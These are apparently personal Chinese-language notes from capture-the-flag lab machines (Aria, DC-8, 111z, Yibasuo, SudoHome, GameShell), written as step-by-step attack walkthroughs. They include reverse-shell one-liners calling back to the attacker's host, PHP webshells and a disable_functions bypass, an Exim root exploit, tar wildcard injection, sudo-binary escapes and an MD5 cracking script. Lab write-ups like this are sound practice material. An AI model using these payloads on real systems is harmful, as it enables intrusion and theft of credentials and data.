接把flag和不可见字符放入解密网站，得到token token: maze-sec
扫描一下端口ss -lntp
LISTEN         0              128                        127.0.0.1:6800                      0.0.0.0:*
www-data@Aria:/var/www/html/uploads$ ps aux | grep aria
root         337  0.0  0.1  56660  2644 ?        Ss   04:00   0:03 /usr/bin/aria2c --conf-path=/root/.aria2/aria2.conf
发现是root用户打开的，测试一下漏洞端口是不是存在
www-data@Aria:/var/www/html/uploads$ curl -s http://127.0.0.1:6800/jsonrpc \
> -H 'Content-Type: application/json' \
> -d '{"jsonrpc":"2.0","method":"aria2.getVersion","id":"Q1"}'
{"id":"Q1","jsonrpc":"2.0","error":{"code":1,"message":"Unauthorized"}}
得到Unauthorized，说明有认证，使用user.txt拿到的token
www-data@Aria:/var/www/html/uploads$ curl -s http://127.0.0.1:6800/jsonrpc \
> -H 'Content-Type: application/json' \
> -d '{"jsonrpc":"2.0","method":"aria2.getVersion","id":"Q1","params":["token:maze-sec"]}'
{"id":"Q1","jsonrpc":"2.0","result":{"enabledFeatures":["Async DNS","BitTorrent","Firefox3 Cookie","GZip","HTTPS","Message Digest","Metalink","XML-RPC","SFTP"],"version":"1.35.0"}}
成功返回版本信息，漏洞存在

攻击机上开启http服务，并把自己的公钥保存到authorized_keys 文件中

┌──(root㉿kali)-[~]
└─# python -m http.server 8080                                                  
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

www-data@Aria:/var/www/html/uploads$
curl -s http://127.0.0.1:6800/jsonrpc \
 -H 'Content-Type: application/json' \
 -d '{
         "jsonrpc":"2.0",
         "method":"aria2.addUri",
         "id":"Q1",
         "params":[
           "token:maze-sec",
           ["http://192.168.3.236:8080/authorized_keys"],
           {"dir":"/root/.ssh/", "out":"authorized_keys"}
         ]
 }'

ssh连接发现获得root权限

DC-8

扫描端口发现还是22和80端口，点击网站旁边的框

?uid=1  输入uid=1' 发现报错 应该是sql注入 sqlmap注入直接打

-D d7db -T users -C name,pass --dump

发现账号和密码
name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

提示使用john爆破密码

出来
john
turtle

dirsearch扫一下目录：/robots.txt /user/login 登录一下john/turtle

成功登录，，然后每个地方点点->在网站 Contact Us 里面发现一个页面 Web Form -> Form settings

发现PHP code 写入反弹shell
<p>wea5e1</p>
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.3.236/4444 0>&1'");
?>

nc 监听
nc -lvvp 4444
192.168.3.1: inverse host lookup failed: Host name lookup failure
connect to [192.168.3.236] from (UNKNOWN) [192.168.3.1] 37894
bash: cannot set terminal process group (372): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-8:/var/www/html$

查看一下权限
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
发现 /usr/sbin/exim4

/usr/sbin/exim4 --version

searchsploit exim

4.87-4.91 Exim 4.87 - 4.91 - Local Privilege Escalation           | linux/local/46996.sh

记得：先在那个网站cd /tmp
searchsploit -m linux/local/46996.sh
wget http://192.168.3.236:4444/46996.sh

www-data@dc-8:/tmp$ wget http://192.168.3.236:8000/46996.sh
wget http://192.168.3.236:8000/46996.sh
--2025-11-19 22:54:49--  http://192.168.3.236:8000/46996.sh
Connecting to 192.168.3.236:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'

46996.sh            100%[===================>]   3.47K  --.-KB/s    in 0.001s  

2025-11-19 22:54:49 (2.68 MB/s) - '46996.sh' saved [3552/3552]

chmod +x 46996.sh
./46996.sh -m netcat

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim) 拿下root

111z

user

打开靶机

sudo arp-scan -I eth1 192.168.3.0/24 //发现192.128.3.128主机
nmap -p- -sT 192.168.3.128
./fscan -h 192.168.3.128 //只发现22端口和80端口
dirsearch 192.168.3.128 (三件套) 发现uploads

curl 192.128.3.128

访问网站，发现是关于文件上传的靶机 测试发现有很多的函数被ban，例如eval system ; 什么的

不过由于php很多特性，例如php允许使用 ?> 直接最后一个php语句不使用分号结束，并且是不区分大小写的

方案一

<?php evAl($_POST[1])?> //

POST /upload.php HTTP/1.1
Host: 192.168.3.128
Content-Length: 599
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarys8mDFzHGXbyy6bNh
Accept: */*
Origin: http://192.168.3.128
Referer: http://192.168.3.128/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
​
------WebKitFormBoundarys8mDFzHGXbyy6bNh
Content-Disposition: form-data; name="file"; filename="3.php"
Content-Type: image/png
​
<?php evAl($_POST[1])?> 

{"success":true,"error":null,"filepath":"691ef2afe8042.php"}

然后发现你是执行不了的，不过命令执行函数被禁用不影响文件读取以及目录扫描等功能，使用蚁剑直接依次查看目录及文件内容，可以发现 llpass.txt 里存放的ll用户 ssh 密码

方案二

既然不能执行命令，那就仅靠webshell扫描指定目录、读取敏感文件，收集信息。

<?php $dir=$_GET[1]?>
<?php $file=$_GET[2]?>
<?php echo '<pre>'?>
<?php print_r(scandir($dir))?>
<?php echo '</pre>'?>
<?php highlight_file($file)?>

Array
(
    [0] => .
    [1] => ..
    [2] => bin
    [3] => boot
    [4] => dev
    [5] => etc
    [6] => home
    [7] => initrd.img
    [8] => initrd.img.old
    [9] => lib
    [10] => lib32
    [11] => lib64
    [12] => libx32
    [13] => lost+found
    [14] => media
    [15] => mnt
    [16] => opt
    [17] => proc
    [18] => root
    [19] => run
    [20] => sbin
    [21] => srv
    [22] => sys
    [23] => tmp
    [24] => usr
    [25] => var
    [26] => vmlinuz
    [27] => vmlinuz.old
)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
ll:x:1000:1000::/home/ll:/bin/bash
mj:x:1001:1001::/home/mj:/bin/bash

?1=/&2=/etc/passwd

扫描目录

?1=/opt&2=/opt/ll*

Array
(
    [0] => .
    [1] => ..
    [2] => backup
    [3] => llpass.txt
)
ll:Bp2tFMYfElkoMWlOUsOD1C30

方案三

还是上面的那个发现执行不了命令，试试phpinfo();，发现回显

disable_functions

    pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,dl,system

因为php配置文件禁用了几乎所有命令执行函数，如果 /tmp 目录可写，并且 putenv 、mail、error_log

函数可用，可以在 /tmp 上传恶意动态链接库文件，利用 putenv 函数设置环境变量，再通过 mail 或

error_log 函数开启一个子进程加载恶意动态链接库，从而实现代码执行。

可以直接利用 中国蚁剑 的插件来实现绕过 disable_functions 辅助工具=>绕过 disable functions-192.168.3.128然后在传小马

然后就和之前的一样，查密码

提权

sudo提权发现可以以无密码的方式使用mj用户下面的neofetch命令

ll@111z:/home$ sudo -l
Matching Defaults entries for ll on 111z:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User ll may run the following commands on 111z:
    (mj) NOPASSWD: /usr/bin/neofetch

https://gtfobins.github.io/gtfobins/neofetch/#shell

ll@111z:/home$ echo 'exec bash' > /tmp/config.txt
ll@111z:/home$ sudo -u mj /usr/bin/neofetch --config /tmp/config.txt
mj@111z:/home$ ls
ll  mj
mj@111z:/home$ cd ./mj
mj@111z:~$ ls
user.txt
mj@111z:~$ cat u*
flag{user-5450dba90b514d69935be5eafbfd0077}

mj@111z:~$ sudo -l
Matching Defaults entries for mj on 111z:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User mj may run the following commands on 111z:
    (root) NOPASSWD: /opt/backup/backup.sh
mj@111z:~$ cat /opt/backup/backup.sh
#!/bin/bash
# 网站上传文件备份脚本
​
cd /var/www/html/uploads
tar czf /tmp/backup.tar.gz *
echo "Backup completed"

发现这个sh文件使用通配*

https://www.freebuf.com/articles/system/176255

然后就直接

cd /var/www/html/uploads
mj@111z:/var/www/html/uploads$ echo '' > '--checkpoint-action=exec=sh shell.sh'
mj@111z:/var/www/html/uploads$ echo '' > '--checkpoint=1'
mj@111z:/var/www/html/uploads$ echo -e '#!/bin/bash\ncp /bin/bash /var/www/html/uploads/bash\nchmod u+s
> /var/www/html/uploads/bash' > shell.sh
mj@111z:/var/www/html/uploads$ sudo /opt/backup/backup.sh
cp: cannot create regular file '/var/www/html/uploads/bash': Text file busy
chmod: missing operand after 'u+s'
Try 'chmod --help' for more information.
root@111z:/var/www/html/uploads# id
uid=0(root) gid=0(root) groups=0(root)
拿下root了

yibasuo

user

打开靶机，然后进行信息搜集

sudo arp-scan -I eth0 192.168.3.0/24

发现靶机地址 ：

192.168.3.248

fscan扫一下192.168.3.248

fscan.exe -h 192.168.3.248/windows  ./fscan -h 192.168.3.248 /linux

nmap 扫一下

发现21(ftp) 22(ssh) 80(http)端口，使用

ftp 192.168.3.248 21 连接

因为在扫描的过程里面是匿名登录，使用name为anonymous 密码为空，直接敲回车

下载到本地

get creds.txt

然后cat一下发现是错的，然后发现这里有个信息

220 (vsFTPd 2.3.4)

搜索一下

https://blog.csdn.net/m0_62670778/article/details/138683346

不过使用工具无法

到达。

然后

ftp 192.168.3.248 21
name:anonymous:)
pass:直接回车
发现是不行的

然后就查看80端口，发现是登录页面，直接爆破 admin/password123

登录进去，发现存在进行输入命令的地方，不过有的是存在不授权的

ls /usr/bin

ls /usr/bin > file.txt

爆破发现bosybox有权限

直接输入命令 进行反弹shell
busybox nc 192.168.3.236 8888 -e /bin/bash

反弹成功

/usr/bin/script -qc /bin/bash /dev/null 稳定shell

然后就是

www-data@Yibasuo:/var/www/html/secure$ cd /home
cd /home
www-data@Yibasuo:/home$ ls
ls
ftp  todd
www-data@Yibasuo:/home$ cd ./tod
cd ./tod
bash: cd: ./tod: No such file or directory
www-data@Yibasuo:/home$ cd ./todd
cd ./todd
www-data@Yibasuo:/home/todd$ cat u*
cat u*
flag{user-43109792-4b81-11f0-a435-9731ae49dbea}

root

在之前说过有个漏洞没有打，但是那个漏洞是打进去，不过没有权限去利用，然后进入内部了，ss -lntup一下发现6200端口开放，

6200端口是写入东西了，直接监听反弹shell，拿下root

www-data@Yibasuo:/var/www/html/secure$ ss -lntup
ss -lntup
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port   
udp     UNCONN   0        0                0.0.0.0:68            0.0.0.0:*      
tcp     LISTEN   0        32               0.0.0.0:21            0.0.0.0:*      
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        100              0.0.0.0:6200          0.0.0.0:*      
tcp     LISTEN   0        128                    *:80                  *:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      
www-data@Yibasuo:/var/www/html/secure$ busybox nc 127.0.0.1 6200
busybox nc 127.0.0.1 6200
ls
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd /root  
cd /root
ls
ls
root.txt
cat root.txt
cat root.txt
flag{root-15d4d3ec-4b81-11f0-9da9-b378f7bb3e40} 

第一次在还是靶机期间拿下root，爽😁😁😁

？？？

Sudohome

user1

打开靶机，扫描出来80端口和21以及25端口

└─# nmap  192.168.3.142                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-24 19:30 CST
Nmap scan report for 192.168.3.142
Host is up (0.0011s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
80/tcp open  http
MAC Address: 08:00:

看看25端口，发现没什么作用，就查看一下80端口

curl 192.168.3.142
<--try ssh-->

那就远程连接看看

ssh ll@192.168.3.142
user1:0woA8Sr7I83R0ZwmnTcH
发现爆用户和密码了

直接远程连接

user1@SudoHome:~$ ls
password.txt
user1@SudoHome:~$ sudo -l
Matching Defaults entries for user1 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user1 may run the following commands on SudoHome:
    (user2) NOPASSWD: /usr/bin/du

user2

发现可以无密码执行user2的du命令

user1@SudoHome:~$ sudo -u user2 /usr/bin/du --help
Usage: /usr/bin/du [OPTION]... [FILE]...
  or:  /usr/bin/du [OPTION]... --files0-from=F
Summarize disk usage of the set of FILEs, recursively for directories.
​
Mandatory arguments to long options are mandatory for short options too.
  -0, --null            end each output line with NUL, not newline
  -a, --all             write counts for all files, not just directories
      --apparent-size   print apparent sizes, rather than disk usage; although
                          the apparent size is usually smaller, it may be
                          larger due to holes in ('sparse') files, internal
                          fragmentation, indirect blocks, and the like
  -B, --block-size=SIZE  scale sizes by SIZE before printing them; e.g.,
                           '-BM' prints sizes in units of 1,048,576 bytes;
                           see SIZE format below
  -b, --bytes           equivalent to '--apparent-size --block-size=1'
  -c, --total           produce a grand total
  -D, --dereference-args  dereference only symlinks that are listed on the
                          command line
  -d, --max-depth=N     print the total for a directory (or file, with --all)
                          only if it is N or fewer levels below the command
                          line argument;  --max-depth=0 is the same as
                          --summarize
      --files0-from=F   summarize disk usage of the
                          NUL-terminated file names specified in file F;
                          if F is -, then read names from standard input
  -H                    equivalent to --dereference-args (-D)
  -h, --human-readable  print sizes in human readable format (e.g., 1K 234M 2G)
      --inodes          list inode usage information instead of block usage
  -k                    like --block-size=1K
  -L, --dereference     dereference all symbolic links
  -l, --count-links     count sizes many times if hard linked
  -m                    like --block-size=1M
  -P, --no-dereference  don't follow any symbolic links (this is the default)
  -S, --separate-dirs   for directories do not include size of subdirectories
      --si              like -h, but use powers of 1000 not 1024
  -s, --summarize       display only a total for each argument
  -t, --threshold=SIZE  exclude entries smaller than SIZE if positive,
                          or entries greater than SIZE if negative
      --time            show time of the last modification of any file in the
                          directory, or any of its subdirectories
      --time=WORD       show time as WORD instead of modification time:
                          atime, access, use, ctime or status
      --time-style=STYLE  show times using STYLE, which can be:
                            full-iso, long-iso, iso, or +FORMAT;
                            FORMAT is interpreted like in 'date'
  -X, --exclude-from=FILE  exclude files that match any pattern in FILE
      --exclude=PATTERN    exclude files that match PATTERN
  -x, --one-file-system    skip directories on different file systems
      --help     display this help and exit
      --version  output version information and exit
​
Display values are in units of the first available SIZE from --block-size,
and the DU_BLOCK_SIZE, BLOCK_SIZE and BLOCKSIZE environment variables.
Otherwise, units default to 1024 bytes (or 512 if POSIXLY_CORRECT is set).
​
The SIZE argument is an integer and optional unit (example: 10K is 10*1024).
Units are K,M,G,T,P,E,Z,Y (powers of 1024) or KB,MB,... (powers of 1000).
​
GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation at: <https://www.gnu.org/software/coreutils/du>
or available locally via: info '(coreutils) du invocation'

 --files0-from=F   summarize disk usage of the
                          NUL-terminated file names specified in file F;
                          if F is -, then read names from standard input

信息是这个文件名以ASCII NUL字符（即\0）分隔的问题，可以从文件F中读取文件名列表，避免了 “文件名含空格、换行” 导致的解析错误。但是当该F文件是一个文件的内容，例如password.txt里面的内容，这个文件名是没有的就会去报错，并且说明这个文件是不存在的，但是报错会把文件名给读出来，也就是上面文件的内容

sudo -u user2 /usr/bin/du --files0-from=/home/user2/password.txt

user1@SudoHome:~$ sudo -u user2 /usr/bin/du --files0-from=/home/user2/password.txt
/usr/bin/du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\n': No such file or directory

user3

user2@SudoHome:~$ sudo -l
Matching Defaults entries for user2 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user2 may run the following commands on SudoHome:
    (user3) NOPASSWD: /usr/bin/file

查看该命令的作用

sudo -u user2 /usr/bin/du --help

https://gtfobins.github.io/gtfobins/file/#file-read 不过可以直接搜这个命令怎么去提权

LFILE=file_to_read
sudo file -f $LFILE

user2@SudoHome:~$ sudo -u user3 /usr/bin/file -f /home/user3/password.txt
TFqxDyfGO69DP1lyjt0f: cannot open `TFqxDyfGO69DP1lyjt0f' (No such file or directory)

user4

user3@SudoHome:~$ sudo -l
Matching Defaults entries for user3 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user3 may run the following commands on SudoHome:
    (user4) NOPASSWD: /usr/bin/mc

user3@SudoHome:~$ mc -help
Usage:
  mc [OPTION…] [this_dir] [other_panel_dir]
​
GNU Midnight Commander 4.8.26
​
​
Help Options:
  -h, --help                Show help options
  --help-all                Show all help options
  --help-terminal           Terminal options
  --help-color              Color options
​
Application Options:
  -V, --version             Displays the current version
  -f, --datadir             Print data directory
  -F, --datadir-info        Print extended info about used data directories
  --configure-options       Print configure options
  -P, --printwd=<file>      Print last working directory to specified file
  -U, --subshell            Enables subshell support (default)
  -u, --nosubshell          Disables subshell support
  -l, --ftplog=<file>       Log ftp dialog to specified file
  -v, --view=<file>         Launches the file viewer on a file
  -e, --edit=<file> ...     Edit files
​
​
Please send any bug reports (including the output of 'mc -V')
​

查看一下mc命令是做什么的

而在 -u 之后会进入交互式shell

-u, --nosubshell          Disables subshell support

user@SudoHome:/home/user3$

发现是这样的，输入whoami命令再退出发现回显的是user4

直接进入cat /home/user4/password.txt

发现成功

user4@SudoHome:/home/user3$ whoami
user4
​
user4@SudoHome:/home/user3$ cat /home/user4/password.txt
B0aWh2XHpp5hOIVtCUbn

user5

user4@SudoHome:~$ sudo -l
Matching Defaults entries for user4 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user4 may run the following commands on SudoHome:
    (user5) NOPASSWD: /usr/bin/ssh
发现是ssh

user4@SudoHome:~$ ssh --help
unknown option -- -
usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]
           [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]
           [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]
           [-i identity_file] [-J [user@]host[:port]] [-L address]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-Q query_option] [-R address] [-S ctl_path] [-W host:port]
           [-w local_tun[:remote_tun]] destination [command]
​

https://gtfobins.github.io/gtfobins/ssh/#sudo

user4@SudoHome:~$ sudo  -u  user5 /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ ls
password.txt
$ cat /home/user5/password.txt
GZ5KErjFycaYHZGj7GcI

user6

user5@SudoHome:~$ sudo -l
Matching Defaults entries for user5 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user5 may run the following commands on SudoHome:
    (user6) NOPASSWD: /usr/bin/rev

https://gtfobins.github.io/gtfobins/rev/#sudo
user5@SudoHome:~$ sudo -u user6 /usr/bin/rev /home/user6/password.txt | rev
Z5cWU36wQhxAVGJbGwoL

user7

user6@SudoHome:~$ sudo -l
Matching Defaults entries for user6 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user6 may run the following commands on SudoHome:
    (user7) NOPASSWD: /usr/bin/cp

user6@SudoHome:/home/user7$ ls -al
total 24
drwxr-xr-x  2 user7 user7 4096 Nov 16 08:35 .
drwxr-xr-x 12 root  root  4096 Nov 16 08:35 ..
-rw-r--r--  1 user7 user7  220 Apr 18  2019 .bash_logout
-rw-r--r--  1 user7 user7 3526 Apr 18  2019 .bashrc
-rw-------  1 user7 user7   21 Nov 16 08:35 password.txt
-rw-r--r--  1 user7 user7  807 Apr 18  2019 .profile
发现.profile是可读

https://gtfobins.github.io/gtfobins/cp/#suid
user6@SudoHome:/home/user7$ sudo -u user7 /usr/bin/cp /home/user7/password.txt /home/user7/.profile
user6@SudoHome:/home/user7$ cat .pro*
HLoKAOu86miWIYKdyVx3

user8

user7@SudoHome:~$ sudo -l
Matching Defaults entries for user7 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user7 may run the following commands on SudoHome:
    (user8) NOPASSWD: /usr/bin/mail

user7@SudoHome:~$ touch /tmp/111
user7@SudoHome:~$ sudo -u user8 /usr/bin/mail -f /tmp/111
Mail version 8.1.2 01/15/2001.  Type ? for help.
"/tmp/111": 0 messages [Read only]
& !/bin/bash
user8@SudoHome:/home/user7$ cat /home/user8/password.txt
UxeGoUq8xqBRxyWVQPYK

user9

user8@SudoHome:~$ sudo -l
Matching Defaults entries for user8 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user8 may run the following commands on SudoHome:
    (user9) NOPASSWD: /usr/bin/wfuzz
wfuzz是一个关于模糊测试的工具，文件中的一行内容会作为 FUZZ 的 payload，wfuzz 会在输出表格的 Payload 列里原样打印这一行，从而泄露密码。

user8@SudoHome:~$ sudo -u user9 /usr/bin/wfuzz -w /home/user9/password.txt http://127.0.0.1/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
​
Target: http://127.0.0.1/FUZZ
Total requests: 1
​
=====================================================================
ID           Response   Lines    Word       Chars       Payload                  
=====================================================================
​
000000001:   404        9 L      31 W       271 Ch      "peqkSBCDKvVxxNwcq1j4"   
​
Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0

user10

user9@SudoHome:~$ sudo -l
Matching Defaults entries for user9 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user9 may run the following commands on SudoHome:
    (user10) NOPASSWD: /usr/bin/md5sum

md5sum

user9@SudoHome:~$ sudo -u user10 /usr/bin/md5sum --help
Usage: /usr/bin/md5sum [OPTION]... [FILE]...
Print or check MD5 (128-bit) checksums.
​
With no FILE, or when FILE is -, read standard input.
​
  -b, --binary         read in binary mode
  -c, --check          read MD5 sums from the FILEs and check them
      --tag            create a BSD-style checksum
  -t, --text           read in text mode (default)
  -z, --zero           end each output line with NUL, not newline,
                       and disable file name escaping
​
The following five options are useful only when verifying checksums:
      --ignore-missing  don't fail or report status for missing files
      --quiet          don't print OK for each successfully verified file
      --status         don't output anything, status code shows success
      --strict         exit non-zero for improperly formatted checksum lines
  -w, --warn           warn about improperly formatted checksum lines
​
      --help     display this help and exit
      --version  output version information and exit
​
The sums are computed as described in RFC 1321.  When checking, the input
should be a former output of this program.  The default mode is to print a
line with checksum, a space, a character indicating input mode ('*' for binary,
' ' for text or where binary is insignificant), and name for each FILE.
​
GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation at: <https://www.gnu.org/software/coreutils/md5sum>
or available locally via: info '(coreutils) md5sum invocation'

md5sum 是可以计算字符串/文件的md5值

查看文件是13k的

-rw-------  1 user10 user10   13 Nov 16 08:35 password.txt

看一下他的一些其他东西

user9@SudoHome:~$ echo '1' > 1.txt
user9@SudoHome:~$ ls -al
total 32
drwxr-xr-x  3 user9 user9 4096 Nov 24 07:27 .
drwxr-xr-x 12 root  root  4096 Nov 16 08:35 ..
-rw-r--r--  1 user9 user9    2 Nov 24 07:27 1.txt
-rw-r--r--  1 user9 user9  220 Apr 18  2019 .bash_logout
-rw-r--r--  1 user9 user9 3526 Apr 18  2019 .bashrc
drwxr-xr-x  3 user9 user9 4096 Nov 24 07:20 .config
-rw-------  1 user9 user9   21 Nov 16 08:35 password.txt
-rw-r--r--  1 user9 user9  807 Apr 18  2019 .profile
user9@SudoHome:~$ cat 1.txt
1
user9@SudoHome:~$ echo '11' > 11.txt
user9@SudoHome:~$ ls -al
total 36
drwxr-xr-x  3 user9 user9 4096 Nov 24 07:28 .
drwxr-xr-x 12 root  root  4096 Nov 16 08:35 ..
-rw-r--r--  1 user9 user9    3 Nov 24 07:28 11.txt
-rw-r--r--  1 user9 user9    2 Nov 24 07:27 1.txt

发现是自动加一个字符，应该是加了换行符

如果 echo 重定向时 使用 -n 参数 就不会多出换行符

那suer10的password应该是12字节加一个换行符

user9@SudoHome:~$ sudo -u user10 md5sum ../user10/password.txt
65e31d336be184593812c18533fa4fa2  ../user10/password.txt
查看他的md5哈希值

<?php
$targetHash = '65e31d336be184593812c18533fa4fa2';
$start_time = microtime(true);
$file = '/usr/share/wordlists/rockyou.txt';
$handle = fopen($file, "r");
if ($handle) {
    while (($line = fgets($handle)) !== false) {
if (md5($line) === $targetHash) {
    $end_time = microtime(true);
    $elapsed_time = $end_time - $start_time;
    echo "Found: " . $line;
    echo "Time elapsed: " . round($elapsed_time, 4) . " seconds\n";
    fclose($handle);
    exit;
}
}
    fclose($handle);
    $end_time = microtime(true);
    $elapsed_time = $end_time - $start_time;
    echo "Not found.\n";
    echo "Search completed in: " . round($elapsed_time, 4) . " seconds\n";
}
?>

脚本直接爆破

php try123.php
Found: morrinsville
Time elapsed: 0.0666 seconds

root

user10@SudoHome:~$ sudo -l
Matching Defaults entries for user10 on SudoHome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
​
User user10 may run the following commands on SudoHome:
    (ALL) NOPASSWD: /usr/bin/cat /home/user10/.important

利用短链接将/root/user.txt和/root/root.txt依次写入.important文件并读取删除

user10@SudoHome:~$ rm -f .important
user10@SudoHome:~$ ln -s /root/root.txt .important
user10@SudoHome:~$ sudo /usr/bin/cat /home/user10/.important
flag{root-f522d1d715970073a6413474ca0e0f63}

gameshell

中间打了好几次，都没打进去🤡

nmap 192.168.3.74
22 80 7681 端口
进去7681发现是一个交互式shell，是一个小游戏 不管了，不想打，直接反弹shell看本地去

busybox nc 192.168.3.219 4444 -e /bin/bash

nc -lvvp 4444

跑⼀遍linpeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

发现有账号显示出来

admin:nimda

本地转发一下 ssh -N -R 127.0.0.1:8888:127.0.0.1:9876 kali@192.168.3.219
[mission 1] $ ssh -N -R 127.0.0.1:9999:127.0.0.1:9876 wea5e1@192.168.3.219
ssh -N -R 127.0.0.1:9999:127.0.0.1:9876 wea5e1@192.168.3.219
The authenticity of host '192.168.3.219 (192.168.3.219)' can't be established.
ECDSA key fingerprint is SHA256:nUWirmUT31d7OjVHs33wBQ0lYTiXqg5uVTRfSEYj64E.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
wea5e1@192.168.3.219's password:

发现需要账号和密码，使用上面的去登录

eviden@GameShell:/$ ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
